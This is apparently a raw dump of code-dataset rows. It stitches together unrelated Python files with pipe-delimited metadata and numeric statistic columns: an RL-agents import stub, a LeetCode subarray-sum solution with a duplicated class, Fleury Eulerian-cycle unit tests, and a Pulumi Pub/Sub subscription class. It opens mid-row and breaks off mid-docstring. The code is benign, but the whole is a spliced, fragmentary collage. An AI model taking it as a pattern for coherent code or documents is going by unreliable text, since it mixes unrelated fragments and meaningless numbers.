))
| 2,628.142857
| 18,287
| 0.96407
| 601
| 18,397
| 29.510815
| 0.975042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157545
| 0.000815
| 18,397
| 6
| 18,288
| 3,066.166667
| 0.807312
| 0.004512
| 0
| 0
| 0
| 0.5
| 0.996341
| 0.996341
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
6d3ea224ef1183365efc1586b189691a7d1a5eb1
| 71
|
py
|
Python
|
rl/agents/__init__.py
|
Luca96/carla-driving-rl-agent
|
00ae9ec6dc61f82ecd19e96b6c1a5e1903911e62
|
[
"MIT"
] | 26
|
2021-01-27T21:42:17.000Z
|
2022-03-31T08:46:30.000Z
|
rl/agents/__init__.py
|
Martje55555/carla-rl-agent
|
0d38cc3080cab900f4eaa3cd4735918c5868103a
|
[
"MIT"
] | 9
|
2021-05-21T14:50:57.000Z
|
2022-03-25T17:50:03.000Z
|
rl/agents/__init__.py
|
Martje55555/carla-rl-agent
|
0d38cc3080cab900f4eaa3cd4735918c5868103a
|
[
"MIT"
] | 10
|
2021-03-23T14:10:14.000Z
|
2022-03-24T17:49:12.000Z
|
from rl.agents.agents import Agent
from rl.agents.ppo import PPOAgent
| 17.75
| 34
| 0.816901
| 12
| 71
| 4.833333
| 0.583333
| 0.206897
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126761
| 71
| 3
| 35
| 23.666667
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6d62abbd45f499a688223d42f5ba4fec4c715f0b
| 2,320
|
py
|
Python
|
leetcode.com/python/325_Maximum_Size_Subarray_Sum_Equals_k.py
|
vansh-tiwari/coding-interview-gym
|
68345725dee0007f52b7ea3550adda35ddcf1955
|
[
"MIT"
] | 713
|
2019-11-19T16:11:25.000Z
|
2022-03-31T02:27:52.000Z
|
leetcode.com/python/325_Maximum_Size_Subarray_Sum_Equals_k.py
|
arunsank/coding-interview-gym
|
8131e3a82795707e144fe55d765b6c15bdb97306
|
[
"MIT"
] | 7
|
2020-01-16T17:07:18.000Z
|
2021-11-15T18:24:39.000Z
|
leetcode.com/python/325_Maximum_Size_Subarray_Sum_Equals_k.py
|
arunsank/coding-interview-gym
|
8131e3a82795707e144fe55d765b6c15bdb97306
|
[
"MIT"
] | 393
|
2019-11-18T17:55:45.000Z
|
2022-03-28T20:26:32.000Z
|
from collections import Counter
class Solution(object):
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
# Sliding Window -- No, because the array contains negative number
# Dictionary + prefixSum technique
maxSubarrayLen, currentSum, prefixSum = 0, 0, 0
prefixSumIndexCounter = Counter() # Stores the indexes of the elements not the occurrences
prefixSumIndexCounter[0] = -1
for idx in range(len(nums)):
currentSum += nums[idx] # increment current sum
prefixSum = currentSum - k
if currentSum == k:
maxSubarrayLen = idx + 1
elif prefixSum in prefixSumIndexCounter: # check if there is a prefix subarray we can take out to reach k
currentSubarrayLen = idx - prefixSumIndexCounter[prefixSum]
maxSubarrayLen = max(maxSubarrayLen, currentSubarrayLen)
if currentSum not in prefixSumIndexCounter:
prefixSumIndexCounter[currentSum] = idx
return maxSubarrayLen
class Solution(object):
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
# Sliding Window -- No, because the array contains negative number
# Dictionary + prefixSum technique
maxSubarrayLen, currentSum, prefixSum = 0, 0, 0
prefixSumIndexCounter = Counter()
prefixSumIndexCounter[0] = -1
for idx in range(len(nums)):
currentSum += nums[idx] # increment current sum
prefixSum = currentSum - k
if currentSum == k:
maxSubarrayLen = idx + 1
elif prefixSum in prefixSumIndexCounter: # check if there is a prefix subarray we can take out to reach k
currentSubarrayLen = idx - prefixSumIndexCounter[prefixSum]
maxSubarrayLen = max(maxSubarrayLen, currentSubarrayLen)
if currentSum not in prefixSumIndexCounter:
prefixSumIndexCounter[currentSum] = idx
return maxSubarrayLen
sol = Solution()
# nums = [1, -1, 5, -2, 3]
# k = 3
# nums = [-2,-1,2,1]
# k = 1
nums = [1,0,-1]
k = -1
out = sol.maxSubArrayLen(nums, k)
print("Res: ", out)
| 37.419355
| 117
| 0.605603
| 238
| 2,320
| 5.903361
| 0.289916
| 0.005694
| 0.027046
| 0.031317
| 0.892527
| 0.892527
| 0.892527
| 0.892527
| 0.892527
| 0.892527
| 0
| 0.016949
| 0.313362
| 2,320
| 62
| 118
| 37.419355
| 0.865035
| 0.246983
| 0
| 0.842105
| 0
| 0
| 0.003018
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.026316
| 0
| 0.184211
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61044ffe3f583cac1c2b0881e84d59cf49ec14bd
| 5,168
|
py
|
Python
|
graphtheory/eulerian/tests/test_fleury.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 36
|
2015-09-20T20:55:39.000Z
|
2021-09-20T05:49:03.000Z
|
graphtheory/eulerian/tests/test_fleury.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 6
|
2016-03-25T21:41:46.000Z
|
2020-02-12T03:18:59.000Z
|
graphtheory/eulerian/tests/test_fleury.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 9
|
2016-09-12T07:57:27.000Z
|
2022-03-21T16:15:39.000Z
|
#!/usr/bin/python
import unittest
from graphtheory.structures.edges import Edge
from graphtheory.structures.graphs import Graph
from graphtheory.eulerian.fleury import FleuryDFS # O(V*E)
from graphtheory.eulerian.fleury import FleuryDFSWithEdges # O(V*E)
from graphtheory.eulerian.fleury import FleuryBFS # O(V*E)
from graphtheory.eulerian.fleury import FleuryBFSWithEdges # O(V*E)
# 0 --- 1 2
# | | / |
# | | / |
# | | / |
# 3 --- 4 --- 5
class TestFleuryUndirectedGraph(unittest.TestCase):
def setUp(self):
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=False)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(0, 3), Edge(1, 4), Edge(3, 4), Edge(4, 2),
Edge(4, 5), Edge(2, 5)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_fleury_dfs(self):
algorithm = FleuryDFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs(self):
algorithm = FleuryBFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_dfs_with_edges(self):
algorithm = FleuryDFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 2), Edge(2, 5), Edge(5, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs_with_edges(self):
algorithm = FleuryBFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 2), Edge(2, 5), Edge(5, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_eulerian(self):
self.G.add_edge(Edge(1, 2))
self.assertRaises(ValueError, FleuryDFS, self.G)
self.assertRaises(ValueError, FleuryBFS, self.G)
self.assertRaises(ValueError, FleuryDFSWithEdges, self.G)
self.assertRaises(ValueError, FleuryBFSWithEdges, self.G)
def tearDown(self): pass
# 0 --o 1 2
# o | / o
# | | / |
# | o o |
# 3 o-- 4 --o 5
class TestFleuryDirectedGraph(unittest.TestCase):
def setUp(self):
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=True)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(3, 0), Edge(1, 4), Edge(4, 3), Edge(2, 4),
Edge(4, 5), Edge(5, 2)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_fleury_dfs(self):
algorithm = FleuryDFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs(self):
algorithm = FleuryBFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_dfs_with_edges(self):
algorithm = FleuryDFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5), Edge(5, 2), Edge(2, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs_with_edges(self):
algorithm = FleuryBFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5), Edge(5, 2), Edge(2, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_eulerian(self):
self.G.add_edge(Edge(1, 2))
self.assertRaises(ValueError, FleuryDFS, self.G)
self.assertRaises(ValueError, FleuryBFS, self.G)
self.assertRaises(ValueError, FleuryDFSWithEdges, self.G)
self.assertRaises(ValueError, FleuryBFSWithEdges, self.G)
def tearDown(self): pass
if __name__ == "__main__":
unittest.main()
# EOF
| 36.394366
| 76
| 0.602361
| 700
| 5,168
| 4.338571
| 0.094286
| 0.039513
| 0.115904
| 0.044781
| 0.901548
| 0.880803
| 0.880803
| 0.876523
| 0.838986
| 0.838986
| 0
| 0.046695
| 0.262384
| 5,168
| 141
| 77
| 36.652482
| 0.75
| 0.074303
| 0
| 0.834951
| 0
| 0
| 0.00168
| 0
| 0
| 0
| 0
| 0
| 0.23301
| 1
| 0.135922
| false
| 0.019417
| 0.067961
| 0
| 0.223301
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b688fe083fdc26c0c6c209804255e82317fad003
| 40,670
|
py
|
Python
|
sdk/python/pulumi_google_native/pubsub/v1/subscription.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/pubsub/v1/subscription.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/pubsub/v1/subscription.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SubscriptionArgs', 'Subscription']
@pulumi.input_type
class SubscriptionArgs:
def __init__(__self__, *,
subscription_id: pulumi.Input[str],
topic: pulumi.Input[str],
ack_deadline_seconds: Optional[pulumi.Input[int]] = None,
dead_letter_policy: Optional[pulumi.Input['DeadLetterPolicyArgs']] = None,
detached: Optional[pulumi.Input[bool]] = None,
enable_message_ordering: Optional[pulumi.Input[bool]] = None,
expiration_policy: Optional[pulumi.Input['ExpirationPolicyArgs']] = None,
filter: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
message_retention_duration: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
push_config: Optional[pulumi.Input['PushConfigArgs']] = None,
retain_acked_messages: Optional[pulumi.Input[bool]] = None,
retry_policy: Optional[pulumi.Input['RetryPolicyArgs']] = None):
"""
The set of arguments for constructing a Subscription resource.
:param pulumi.Input[str] topic: The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
:param pulumi.Input[int] ack_deadline_seconds: The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
:param pulumi.Input['DeadLetterPolicyArgs'] dead_letter_policy: A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscriptions's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
:param pulumi.Input[bool] detached: Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
:param pulumi.Input[bool] enable_message_ordering: If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
:param pulumi.Input['ExpirationPolicyArgs'] expiration_policy: A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
:param pulumi.Input[str] filter: An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: See Creating and managing labels.
:param pulumi.Input[str] message_retention_duration: How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
:param pulumi.Input[str] name: The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
:param pulumi.Input['PushConfigArgs'] push_config: If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
:param pulumi.Input[bool] retain_acked_messages: Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp] (https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
:param pulumi.Input['RetryPolicyArgs'] retry_policy: A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
"""
pulumi.set(__self__, "subscription_id", subscription_id)
pulumi.set(__self__, "topic", topic)
if ack_deadline_seconds is not None:
pulumi.set(__self__, "ack_deadline_seconds", ack_deadline_seconds)
if dead_letter_policy is not None:
pulumi.set(__self__, "dead_letter_policy", dead_letter_policy)
if detached is not None:
pulumi.set(__self__, "detached", detached)
if enable_message_ordering is not None:
pulumi.set(__self__, "enable_message_ordering", enable_message_ordering)
if expiration_policy is not None:
pulumi.set(__self__, "expiration_policy", expiration_policy)
if filter is not None:
pulumi.set(__self__, "filter", filter)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if message_retention_duration is not None:
pulumi.set(__self__, "message_retention_duration", message_retention_duration)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if push_config is not None:
pulumi.set(__self__, "push_config", push_config)
if retain_acked_messages is not None:
pulumi.set(__self__, "retain_acked_messages", retain_acked_messages)
if retry_policy is not None:
pulumi.set(__self__, "retry_policy", retry_policy)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subscription_id", value)
@property
@pulumi.getter
def topic(self) -> pulumi.Input[str]:
"""
The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
"""
return pulumi.get(self, "topic")
@topic.setter
def topic(self, value: pulumi.Input[str]):
pulumi.set(self, "topic", value)
@property
@pulumi.getter(name="ackDeadlineSeconds")
def ack_deadline_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
"""
return pulumi.get(self, "ack_deadline_seconds")
@ack_deadline_seconds.setter
def ack_deadline_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ack_deadline_seconds", value)
@property
@pulumi.getter(name="deadLetterPolicy")
def dead_letter_policy(self) -> Optional[pulumi.Input['DeadLetterPolicyArgs']]:
"""
A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscriptions's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
"""
return pulumi.get(self, "dead_letter_policy")
@dead_letter_policy.setter
def dead_letter_policy(self, value: Optional[pulumi.Input['DeadLetterPolicyArgs']]):
pulumi.set(self, "dead_letter_policy", value)
@property
@pulumi.getter
def detached(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
"""
return pulumi.get(self, "detached")
@detached.setter
def detached(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "detached", value)
@property
@pulumi.getter(name="enableMessageOrdering")
def enable_message_ordering(self) -> Optional[pulumi.Input[bool]]:
"""
If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
"""
return pulumi.get(self, "enable_message_ordering")
@enable_message_ordering.setter
def enable_message_ordering(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_message_ordering", value)
@property
@pulumi.getter(name="expirationPolicy")
def expiration_policy(self) -> Optional[pulumi.Input['ExpirationPolicyArgs']]:
"""
A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
"""
return pulumi.get(self, "expiration_policy")
@expiration_policy.setter
def expiration_policy(self, value: Optional[pulumi.Input['ExpirationPolicyArgs']]):
pulumi.set(self, "expiration_policy", value)
@property
@pulumi.getter
def filter(self) -> Optional[pulumi.Input[str]]:
"""
An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
"""
return pulumi.get(self, "filter")
@filter.setter
def filter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
See Creating and managing labels.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="messageRetentionDuration")
def message_retention_duration(self) -> Optional[pulumi.Input[str]]:
"""
How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
"""
return pulumi.get(self, "message_retention_duration")
@message_retention_duration.setter
def message_retention_duration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message_retention_duration", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="pushConfig")
def push_config(self) -> Optional[pulumi.Input['PushConfigArgs']]:
"""
If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
"""
return pulumi.get(self, "push_config")
@push_config.setter
def push_config(self, value: Optional[pulumi.Input['PushConfigArgs']]):
pulumi.set(self, "push_config", value)
@property
@pulumi.getter(name="retainAckedMessages")
def retain_acked_messages(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp] (https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
"""
return pulumi.get(self, "retain_acked_messages")
@retain_acked_messages.setter
def retain_acked_messages(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "retain_acked_messages", value)
@property
@pulumi.getter(name="retryPolicy")
def retry_policy(self) -> Optional[pulumi.Input['RetryPolicyArgs']]:
"""
A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
"""
return pulumi.get(self, "retry_policy")
@retry_policy.setter
def retry_policy(self, value: Optional[pulumi.Input['RetryPolicyArgs']]):
pulumi.set(self, "retry_policy", value)
class Subscription(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ack_deadline_seconds: Optional[pulumi.Input[int]] = None,
dead_letter_policy: Optional[pulumi.Input[pulumi.InputType['DeadLetterPolicyArgs']]] = None,
detached: Optional[pulumi.Input[bool]] = None,
enable_message_ordering: Optional[pulumi.Input[bool]] = None,
expiration_policy: Optional[pulumi.Input[pulumi.InputType['ExpirationPolicyArgs']]] = None,
filter: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
message_retention_duration: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
push_config: Optional[pulumi.Input[pulumi.InputType['PushConfigArgs']]] = None,
retain_acked_messages: Optional[pulumi.Input[bool]] = None,
retry_policy: Optional[pulumi.Input[pulumi.InputType['RetryPolicyArgs']]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Creates a subscription to a given topic. See the [resource name rules] (https://cloud.google.com/pubsub/docs/admin#resource_names). If the subscription already exists, returns `ALREADY_EXISTS`. If the corresponding topic doesn't exist, returns `NOT_FOUND`. If the name is not provided in the request, the server will assign a random name for this subscription on the same project as the topic, conforming to the [resource name format] (https://cloud.google.com/pubsub/docs/admin#resource_names). The generated name is populated in the returned Subscription object. Note that for REST API requests, you must specify a name in the request.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] ack_deadline_seconds: The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
:param pulumi.Input[pulumi.InputType['DeadLetterPolicyArgs']] dead_letter_policy: A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscriptions's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
:param pulumi.Input[bool] detached: Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
:param pulumi.Input[bool] enable_message_ordering: If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
